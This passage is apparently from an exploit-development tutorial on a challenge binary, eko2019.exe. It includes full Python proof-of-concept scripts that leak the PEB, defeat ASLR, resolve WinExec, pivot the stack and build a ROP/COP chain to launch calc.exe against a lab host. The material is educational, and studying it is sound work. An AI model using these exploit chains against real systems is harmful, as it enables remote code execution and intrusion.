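    print(name, "->", argument_location(position))
```

So for WriteProcessMemory(), only lpNumberOfBytesWritten ends up on the stack.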

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is referenced by the R8 register, to the location of sub_140001000 (eko2019.exe+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!
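If struct.unpack_from() is unfamiliar, here is a tiny standalone Python 3 sketch of that parsing step. The response bytes are fabricated stand-in data (they do not come from eko2019.exe), and `first_qword` is a hypothetical helper name.

```python
import struct

def first_qword(response):
    """Interpret the first 8 bytes of a response as a little-endian unsigned QWORD."""
    # unpack_from() always returns a tuple, even for a single value
    return struct.unpack_from("<Q", response)[0]

# Stand-in for what s.recv(1024) might hand back (made-up bytes)
sample_response = struct.pack("<Q", 0x21d) + b"\x00" * 8

print(hex(first_qword(sample_response)))
```

Note that unpack_from() only needs the buffer to be at least 8 bytes long. Any extra bytes after the first QWORD are ignored.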

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [rcx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particularly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primitive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer that get stored into RCX?
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, let’s start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of a process.

Why is this relevant, you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from the two previous posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very pertinent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.
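To make the prefix swap concrete, here is a minimal Python sketch of the bytes involved. The helper name `with_prefix` is made up for illustration; the only facts it relies on are the byte values already given above.

```python
# Bytes of the instruction that already exists in eko2019.exe
MOV_RAX_PTR_RCX = b"\x48\x8b\x01"  # mov rax, qword ptr [rcx]

# 0x65 is the x86-64 GS segment-override prefix
GS_OVERRIDE = b"\x65"


def with_prefix(prefix: bytes, instruction: bytes) -> bytes:
    """Return the bytes the CPU sees when `prefix` sits directly before `instruction`."""
    return prefix + instruction


gs_variant = with_prefix(GS_OVERRIDE, MOV_RAX_PTR_RCX)
print(gs_variant.hex())  # 65488b01 -> mov rax, qword ptr gs:[rcx]
```

The single byte we control sits directly in front of the existing instruction, so choosing its value decides how the following three bytes are interpreted.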

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation, we have the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.
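Since every request in this exploit shares the same layout, it can help to see that layout as one small function. This is only a sketch in Python 3 (the proof of concept itself is Python 2), and `build_request` is a hypothetical helper name, not something taken from the original exploit.

```python
import struct

HEADER = b"Eko2019\x00" + b"\x90" * 8  # 16-byte header sent with every request
PADDING_LEN = 512                       # filler before the byte we control
TOTAL_LEN = 544                         # length the proof of concept pads to


def build_request(control_byte: int, rcx_value: int) -> bytes:
    """Lay out a request: header, padding, control byte, 7 filler bytes, RCX value."""
    payload = HEADER
    payload += b"\x41" * PADDING_LEN
    payload += bytes([control_byte])         # byte placed before mov rax, qword ptr [rcx]
    payload += b"\x41" * 7                   # filler up to the 8-byte value loaded into RCX
    payload += struct.pack("<Q", rcx_value)  # little-endian qword that ends up in RCX
    payload += b"\x41" * (TOTAL_LEN - len(payload))
    return payload


# First request: GS override prefix, RCX = 0x60
peb_request = build_request(0x65, 0x60)
print(len(peb_request))  # 544
```

Written this way, the later requests only differ in the two arguments passed in.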

What is most devastating about identifying the PEB of eko2019.exe is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10.

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the server, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?
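Resolving a gadget "via offsets" just means adding a fixed offset to whatever base address was leaked at runtime. A minimal sketch, assuming a made-up base address and a made-up offset (neither value comes from the target):

```python
def rebase(module_base: int, offset: int) -> int:
    """Turn an offset inside a module into a virtual address for this run."""
    return module_base + offset


# Hypothetical values, for illustration only
example_base = 0x7FF6C3A10000   # what the leak might return on one run
example_offset = 0x1000         # placeholder offset of some gadget

print(hex(rebase(example_base, example_offset)))  # 0x7ff6c3a11000
```

The offset stays constant between runs, while the base changes each time the process restarts, which is why the leak has to be repeated on every run of the exploit.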

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a third request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from the address held in RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!
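The three requests so far all follow the same pattern: put an address in RCX, let the application dereference it, and unpack the first 8 bytes of the response. A hedged sketch of that read primitive as one reusable function is below. `read_qword`, `build_read_request`, and the `send_and_receive` callable are hypothetical names, and the fake transport only stands in for the real socket so the example runs on its own.

```python
import struct
from typing import Callable

HEADER = b"Eko2019\x00" + b"\x90" * 8
RCX_OFFSET = 16 + 512 + 1 + 7  # where the RCX qword sits inside a request


def build_read_request(address: int, control_byte: int = 0x90) -> bytes:
    """Request that makes the target run mov rax, qword ptr [rcx] with RCX = address."""
    request = HEADER + b"\x41" * 512
    request += bytes([control_byte]) + b"\x41" * 7
    request += struct.pack("<Q", address)
    return request


def read_qword(address: int,
               send_and_receive: Callable[[bytes], bytes],
               control_byte: int = 0x90) -> int:
    """Leak the 8-byte value stored at `address` using the supplied transport."""
    response = send_and_receive(build_read_request(address, control_byte))
    if len(response) < 8:
        raise ValueError("response too short to contain a leaked qword")
    return struct.unpack_from("<Q", response)[0]


# Stand-in for the network: a fake memory map with made-up contents
FAKE_MEMORY = {0x1000: 0x7FF6C3A10000}


def fake_transport(request: bytes) -> bytes:
    address = struct.unpack_from("<Q", request, RCX_OFFSET)[0]
    return struct.pack("<Q", FAKE_MEMORY[address])


leaked = read_qword(0x1000, fake_transport)
print(hex(leaked))  # 0x7ff6c3a10000
```

In the real exploit the transport would open a socket, send the request, and return the result of recv(), exactly as each stage of the proof of concept does.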

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. Recall from earlier that when we first increased our number of bytes from 512 to 528, the \x41 byte was executed BEFORE the mov rax, qword ptr [rcx] instruction (which resulted in an access violation and a subsequent crash). The disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction- because that byte doesn’t combine with the opcodes of said move instruction to form a variant of it.

Investigating a little bit more, we can recall that our move instruction is also followed by a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack will actually place said item at the address RSP points to! This means that we can place our own ROP gadget at the top of the stack, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.
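To see why push rcx followed by ret hands control to whatever is in RCX, here is a toy model of the two instructions in Python. It is purely illustrative: the `ToyCpu` class, the starting RSP, and the base address are all made up, and only the 0x158b offset comes from the rp++ output above.

```python
class ToyCpu:
    """Tiny model of RSP, RIP, and a sparse stack memory."""

    def __init__(self, rsp: int):
        self.rsp = rsp
        self.rip = None
        self.memory = {}

    def push(self, value: int) -> None:
        # push: move RSP down 8 bytes, then store the value where RSP points
        self.rsp -= 8
        self.memory[self.rsp] = value

    def ret(self) -> None:
        # ret: load RIP from where RSP points, then move RSP back up 8 bytes
        self.rip = self.memory[self.rsp]
        self.rsp += 8


hypothetical_base = 0x7FF6C3A10000
pivot_gadget = hypothetical_base + 0x158B  # value we placed in RCX

cpu = ToyCpu(rsp=0x1000)
cpu.push(pivot_gadget)  # push rcx
cpu.ret()               # ret at the end of the function

print(hex(cpu.rip))  # 0x7ff6c3a1158b
```

After the ret, RSP is back where it was before the push, which is why the pivot gadget's add rsp, X then moves it into the part of the stack we control.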

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first three requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SW_SHOWNORMAL.
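The argument placement above can be written down as a small lookup. This is a sketch only: `assign_arguments` is a hypothetical helper, the pointer value is made up, and it models integer and pointer arguments only.

```python
INTEGER_ARG_REGISTERS = ("rcx", "rdx", "r8", "r9")
SW_SHOWNORMAL = 0x1


def assign_arguments(args):
    """Map positional arguments to registers, then to stack slots from RSP+0x20."""
    placement = {}
    for index, value in enumerate(args):
        if index < len(INTEGER_ARG_REGISTERS):
            placement[INTEGER_ARG_REGISTERS[index]] = value
        else:
            slot = 0x20 + 8 * (index - len(INTEGER_ARG_REGISTERS))
            placement["rsp+0x%x" % slot] = value
    return placement


# WinExec(lpCmdLine, uCmdShow) with a made-up pointer to the "calc" string
hypothetical_calc_pointer = 0x7FF6C3A1C288
winexec_args = assign_arguments([hypothetical_calc_pointer, SW_SHOWNORMAL])
print(winexec_args)
```

For WinExec() only RCX and RDX are involved, which is why the ROP chain that follows only has to control those two registers.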

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1.

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will actually be performing a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.
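It may not be obvious why exactly one qword of padding follows the COP gadget. The call r12 instruction pushes an 8-byte return address, so add rsp, 0x10 has to skip that return address plus one more qword before the ret picks up the next gadget. A toy simulation of this, with hypothetical names and placeholder stack contents:

```python
def next_gadget_after_cop(stack_after_cop_gadget):
    """Model call r12 -> add rsp, 0x10 ; ret and report what the ret pops.

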